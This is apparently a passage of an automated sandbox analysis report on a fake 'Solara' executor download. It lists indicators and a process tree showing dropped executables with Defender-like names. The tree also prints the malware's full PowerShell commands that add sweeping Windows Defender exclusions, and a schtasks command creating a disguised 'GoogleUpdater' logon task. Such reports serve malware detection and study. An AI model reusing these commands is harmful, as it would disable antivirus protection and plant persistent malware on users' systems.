msedge.exemsedge.exeidentity_helper.exemsedge.exejavaw.exepowershell.exepowershell.exeMpWinHelper32.exeMpDefenderRuntime.exepowershell.exepowershell.exeMpWinSDK.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 1848 msedge.exe 1848 msedge.exe 5112 msedge.exe 5112 msedge.exe 388 identity_helper.exe 388 identity_helper.exe 1300 msedge.exe 1300 msedge.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5472 javaw.exe 5308 powershell.exe 5308 powershell.exe 5308 powershell.exe 5264 powershell.exe 5264 powershell.exe 5264 powershell.exe 5276 MpWinHelper32.exe 5276 MpWinHelper32.exe 5304 MpDefenderRuntime.exe 5304 MpDefenderRuntime.exe 3764 powershell.exe 3764 powershell.exe 3764 powershell.exe 5944 powershell.exe 5944 powershell.exe 5944 powershell.exe 5932 MpWinSDK.exe 5932 MpWinSDK.exe 4712 powershell.exe 4712 powershell.exe 4136 powershell.exe 4136 powershell.exe 1896 powershell.exe 1896 powershell.exe 4712 powershell.exe 4712 powershell.exe 4136 powershell.exe 6668 powershell.exe 6668 powershell.exe 6892 powershell.exe 6892 powershell.exe 1896 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
RunShell.exepid process 6496 RunShell.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 656 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 21 IoCs
Processes:
msedge.exechrome.exepid process 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
javaw.exewmic.exepowershell.exepowershell.exeMpWinHelper32.exepowershell.exepowershell.exeMpWinSDK.exepowershell.exepowershell.exetasklist.exepowershell.exetasklist.exeWMIC.exedescription pid process Token: SeBackupPrivilege 5472 javaw.exe Token: SeBackupPrivilege 5472 javaw.exe Token: SeSecurityPrivilege 5472 javaw.exe Token: SeDebugPrivilege 5472 javaw.exe Token: SeIncreaseQuotaPrivilege 5892 wmic.exe Token: SeSecurityPrivilege 5892 wmic.exe Token: SeTakeOwnershipPrivilege 5892 wmic.exe Token: SeLoadDriverPrivilege 5892 wmic.exe Token: SeSystemProfilePrivilege 5892 wmic.exe Token: SeSystemtimePrivilege 5892 wmic.exe Token: SeProfSingleProcessPrivilege 5892 wmic.exe Token: SeIncBasePriorityPrivilege 5892 wmic.exe Token: SeCreatePagefilePrivilege 5892 wmic.exe Token: SeBackupPrivilege 5892 wmic.exe Token: SeRestorePrivilege 5892 wmic.exe Token: SeShutdownPrivilege 5892 wmic.exe Token: SeDebugPrivilege 5892 wmic.exe Token: SeSystemEnvironmentPrivilege 5892 wmic.exe Token: SeRemoteShutdownPrivilege 5892 wmic.exe Token: SeUndockPrivilege 5892 wmic.exe Token: SeManageVolumePrivilege 5892 wmic.exe Token: 33 5892 wmic.exe Token: 34 5892 wmic.exe Token: 35 5892 wmic.exe Token: 36 5892 wmic.exe Token: SeIncreaseQuotaPrivilege 5892 wmic.exe Token: SeSecurityPrivilege 5892 wmic.exe Token: SeTakeOwnershipPrivilege 5892 wmic.exe Token: SeLoadDriverPrivilege 5892 wmic.exe Token: SeSystemProfilePrivilege 5892 wmic.exe Token: SeSystemtimePrivilege 5892 wmic.exe Token: SeProfSingleProcessPrivilege 5892 wmic.exe Token: SeIncBasePriorityPrivilege 5892 wmic.exe Token: SeCreatePagefilePrivilege 5892 wmic.exe Token: SeBackupPrivilege 5892 wmic.exe Token: SeRestorePrivilege 5892 wmic.exe Token: SeShutdownPrivilege 5892 wmic.exe Token: SeDebugPrivilege 5892 wmic.exe Token: SeSystemEnvironmentPrivilege 5892 wmic.exe Token: SeRemoteShutdownPrivilege 5892 wmic.exe Token: SeUndockPrivilege 5892 wmic.exe Token: SeManageVolumePrivilege 5892 wmic.exe Token: 33 5892 wmic.exe Token: 34 5892 wmic.exe Token: 35 5892 wmic.exe Token: 36 5892 wmic.exe Token: SeDebugPrivilege 5308 powershell.exe Token: SeDebugPrivilege 5264 powershell.exe Token: SeRestorePrivilege 5472 javaw.exe Token: SeDebugPrivilege 5276 MpWinHelper32.exe Token: SeDebugPrivilege 3764 powershell.exe Token: SeDebugPrivilege 5944 powershell.exe Token: SeDebugPrivilege 5932 MpWinSDK.exe Token: SeDebugPrivilege 4712 powershell.exe Token: SeDebugPrivilege 4136 powershell.exe Token: SeDebugPrivilege 5704 tasklist.exe Token: SeDebugPrivilege 1896 powershell.exe Token: SeDebugPrivilege 5096 tasklist.exe Token: SeIncreaseQuotaPrivilege 6640 WMIC.exe Token: SeSecurityPrivilege 6640 WMIC.exe Token: SeTakeOwnershipPrivilege 6640 WMIC.exe Token: SeLoadDriverPrivilege 6640 WMIC.exe Token: SeSystemProfilePrivilege 6640 WMIC.exe Token: SeSystemtimePrivilege 6640 WMIC.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
msedge.exepid process 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
msedge.exefirefox.exechrome.exepid process 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 5112 msedge.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 6392 firefox.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe 7032 chrome.exe -
Suspicious use of SetWindowsHookEx 11 IoCs
Processes:
Solara NEW.exejavaw.exeWinSFX.exeWinDefender.exeMpWinDefenderService.exeMpWinDefenderService.exeMpDefenderCoreService.exeMpCmdRun.exerar.exefirefox.exepid process 5396 Solara NEW.exe 5472 javaw.exe 5472 javaw.exe 6068 WinSFX.exe 5552 WinDefender.exe 5748 MpWinDefenderService.exe 5804 MpWinDefenderService.exe 5312 MpDefenderCoreService.exe 5912 MpCmdRun.exe 4192 rar.exe 6392 firefox.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
msedge.exedescription pid process target process PID 5112 wrote to memory of 2784 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2784 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2164 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 1848 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 1848 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe PID 5112 wrote to memory of 2692 5112 msedge.exe msedge.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 4 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exepid process 6692 attrib.exe 6600 attrib.exe 5648 attrib.exe 752 attrib.exe
Processes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://raw.githubusercontent.com/ByterCode/Solara-Excutor/refs/heads/main/Solara%20NEW.zip1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5112 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd480846f8,0x7ffd48084708,0x7ffd480847182⤵PID:2784
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:22⤵PID:2164
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1848 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2908 /prefetch:82⤵PID:2692
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3348 /prefetch:12⤵PID:3788
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:4032
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:82⤵PID:1012
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5072 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:388 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4776 /prefetch:12⤵PID:4432
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5124 /prefetch:12⤵PID:4584
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4152 /prefetch:12⤵PID:5072
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:12⤵PID:232
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5972 /prefetch:82⤵PID:1672
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:12⤵PID:116
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2080,4860545431235443515,18389540430312366972,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5940 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1300
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2068
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2920
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:5356
-
C:\Users\Admin\AppData\Local\Temp\Temp1_Solara NEW.zip\Solara NEW.exe"C:\Users\Admin\AppData\Local\Temp\Temp1_Solara NEW.zip\Solara NEW.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:5396 -
C:\Program Files\Java\jre-1.8\bin\javaw.exe"C:\Program Files\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Local\Temp\Temp1_Solara NEW.zip\Solara NEW.exe"2⤵
- Drops startup file
- Loads dropped DLL
- Enumerates connected drives
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5472 -
C:\Windows\SYSTEM32\reg.exereg query HKLM\HARDWARE\DESCRIPTION\System /v SystemBiosVersion3⤵
- Checks BIOS information in registry
- Modifies registry key
PID:5852 -
C:\Windows\System32\Wbem\wmic.exewmic diskdrive get model3⤵
- Suspicious use of AdjustPrivilegeToken
PID:5892 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5264 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:SystemDrive) -Force3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5308 -
C:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinSFX.exeC:\Users\Admin\AppData\Roaming\WinSFXConnectDevicesPlatform\WinSFX.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6068 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\Windows\Defender\9MtIZXiAw.vbe"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:244 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Windows\Defender\Es1BthyXvq2km5CiHkXHry3WVfzj.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:7048 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"C:\Users\Admin\AppData\Roaming\Windows/Defender/RunShell.exe"6⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Drops file in Program Files directory
- Modifies registry class
PID:5688 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nvpxylj3\nvpxylj3.cmdline"7⤵
- Drops file in System32 directory
PID:6720 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5752.tmp" "c:\Windows\System32\CSCB59BB1DD46334AD8911ABF5DB637A37.TMP"8⤵PID:5388
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Portable Devices\RuntimeBroker.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6288 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\agentComponentFontNet\System.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6148 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WindowsRE\msedge.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6796 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Security\BrowserCore\en-US\lsass.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\agentComponentFontNet\TrustedInstaller.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:6944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe'7⤵
- Command and Scripting Interpreter: PowerShell
PID:5500 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\uAhO8zbU6i.bat"7⤵PID:5388
-
C:\Windows\system32\chcp.comchcp 650018⤵PID:5928
-
C:\Windows\system32\w32tm.exew32tm /stripchart /computer:localhost /period:5 /dataonly /samples:28⤵PID:6228
-
C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\RunShell.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
PID:6496 -
C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinHelper32.exe"C:\Users\Admin\AppData\Roaming\Windows\Defender\MpWinHelper32.exe"4⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5276 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit5⤵PID:5460
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3764 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5944 -
C:\Windows\SYSTEM32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdater" /tr "C:\Windows\system32\GoogleUpdater.exe"5⤵PID:5788
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "GoogleUpdater" /tr "C:\Windows\system32\GoogleUpdater.exe"6⤵
- Scheduled Task/Job: Scheduled Task
PID:2104 -
C:\Windows\SYSTEM32\cmd.exe"cmd" cmd /c "C:\Windows\system32\GoogleUpdater.exe"5⤵PID:6360
-
C:\Windows\system32\GoogleUpdater.exeC:\Windows\system32\GoogleUpdater.exe6⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetThreadContext
PID:7108 -
C:\Windows\system32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit7⤵PID:2028
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:3592 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"8⤵
- Command and Scripting Interpreter: PowerShell
PID:4912 -
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"7⤵
- Executes dropped EXE
